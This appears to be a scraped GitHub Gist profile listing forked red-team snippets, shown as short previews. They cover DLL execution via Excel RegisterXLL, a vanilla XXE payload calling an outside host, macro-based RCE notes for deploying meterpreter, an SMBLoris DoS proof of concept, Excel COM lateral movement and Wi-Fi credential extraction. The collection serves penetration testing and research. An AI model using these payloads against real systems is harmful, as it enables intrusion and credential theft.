Skip to content

Instantly share code, notes, and snippets.

View minkione's full-sized avatar

Anthony Bordel minkione

28 followers · 12 following
View GitHub Profile
@minkione
minkione / ExcelXLL.md
Created July 31, 2017 11:25 — forked from ryhanson/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@minkione
minkione / EQgroup.md
Created August 14, 2017 10:10 — forked from bontchev/EQgroup.md
Curated list of links describing the leaked Equation Group tools for Windows

Links describing the leaked EQ Group tools for Windows

Repositories and ports

Installation and usage guides

@minkione
minkione / XXE_payloads
Created August 16, 2017 08:28 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@minkione
minkione / Dockerfile
Created August 17, 2017 06:24 — forked from staaldraad/Dockerfile
Use Docker to run @sensepost Mana like a hipster
# Mana-toolkit from @sensepost
#
# VERSION 0.1
FROM ubuntu
MAINTAINER Etienne Stalmans, [email protected]
RUN apt-get update && apt-get install -y \
unzip \
@minkione
minkione / GL-iNet
Created August 17, 2017 07:12 — forked from cj1324/GL-iNet
GL-iNet OpenWrt Patch base attitude_adjustment, http://www.gl-inet.com/
Index: target/linux/ar71xx/files/arch/mips/ath79/mach-tl-wr703n.c
===================================================================
--- target/linux/ar71xx/files/arch/mips/ath79/mach-tl-wr703n.c (revision 38494)
+++ target/linux/ar71xx/files/arch/mips/ath79/mach-tl-wr703n.c (working copy)
@@ -21,7 +21,9 @@
#include "dev-wmac.h"
#include "machtypes.h"
-#define TL_WR703N_GPIO_LED_SYSTEM 27
+#define TL_WR703N_GPIO_LED_SYSTEM 13
@minkione
minkione / Various-Macro-Based-RCEs.md
Created August 25, 2017 13:41 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction techniques that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the below examples had been generated for using as a remote address: 192.168.56.101.

List:

  1. Page substiution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
@minkione
minkione / smbloris.c
Created September 6, 2017 09:23 — forked from marcan/smbloris.c
SMBLoris attack proof of concept
/* SMBLoris attack proof-of-concept
*
* Copyright 2017 Hector Martin "marcan" <[email protected]>
*
* Licensed under the terms of the 2-clause BSD license.
*
* This is a proof of concept of a publicly disclosed vulnerability.
* Please do not go around randomly DoSing people with it.
*
* Tips: do not use your local IP as source, or if you do, use iptables to block
@minkione
minkione / Invoke-ExcelMacroPivot.ps1
Created September 12, 2017 08:57 — forked from enigma0x3/Invoke-ExcelMacroPivot.ps1
function Invoke-ExcelMacroPivot{
<#
.AUTHOR
Matt Nelson (@enigma0x3)
.SYNOPSIS
Pivots to a remote host by using an Excel macro and Excel's COM object
.PARAMETER Target
Remote host to pivot to
.PARAMETER RemoteDocumentPath
Local path on the remote host where the payload resides
@minkione
minkione / AtomicRedTeam.sct
Created October 2, 2017 07:52
Sample COM Hijacking Atomic Red Team Test
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
@minkione
minkione / Extract-WiFi-Creds.ps1
Created October 3, 2017 10:32 — forked from gfoss/Extract-WiFi-Creds.ps1
Simple script to extract locally-stored Wi-Fi Credentials
#====================================#
# Extract Wi-Fi Credentials #
# greg . foss @ owasp . org #
# v0.1 -- July, 2017 #
#====================================#
# Licensed under the MIT License
<#